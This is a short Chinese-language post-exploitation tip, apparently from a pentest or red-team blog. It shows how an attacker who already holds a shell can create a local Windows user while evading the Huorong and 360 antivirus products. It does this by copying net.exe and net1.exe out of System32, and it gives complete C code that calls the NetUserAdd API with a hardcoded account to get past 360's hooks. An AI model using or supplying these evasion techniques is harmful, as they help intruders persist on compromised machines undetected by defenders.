在拿了shell上线了的情况下,通过net user add新建用户经常会被杀软拦截拒绝访问,以比较常用的火绒和360为例,简单说一下绕过的小tips
某绒
可以看到通过net user命令新建用户,火绒拦了,检测的是cmd.exe去执行C:\Windows\System32\net.exe
把C:\Windows\System32\net.exe复制出来放到别的文件夹下,这里我放在test里面
重新执行net.exe user huorong 123 /add ,可以看到现在火绒检测的是net.exe去操作C:\Windows\System32\net1.exe
同理,把net1.exe复制出来去执行,成功执行了新建用户,且火绒没有提示
挺简单暴力的一个方式,综上可以看到火绒hook的是
cmd.exe -> C:\Windows\System32\net.exe -> C:\Windows\System32\net1.exe
某60
先使用正常的net user add添加用户,直接拦了
我们同上某绒的操作去绕过,发现绕过不去
net1.exe是调用win32api来进行新建用户,尝试写一个api看360有没有hook
#ifndef UNICODE
#define UNICODE
#endif
#include <stdio.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
int wmain(int argc, wchar_t* argv[])
{
const wchar_t* username = L"bin123"; // username
const wchar_t* password = L"Abc123123"; // password
// 定义并初始化 USER_INFO_1 结构体,用于保存新用户的信息
USER_INFO_1 ui;
DWORD dwError = 0;
ui.usri1_name = (wchar_t*)username; //设置用户名
ui.usri1_password = (wchar_t*)password;//设置密码
ui.usri1_priv = USER_PRIV_USER; //设置用户权限为普通用户
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
//调用Windows API函数NetuserAdd来添加新用户
if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success) {
printf("add user success\n");
}
else
{
printf("add user fail\n");
}
return 0;
}
生成解决方案后运行,可以看到直接绕过360新建用户
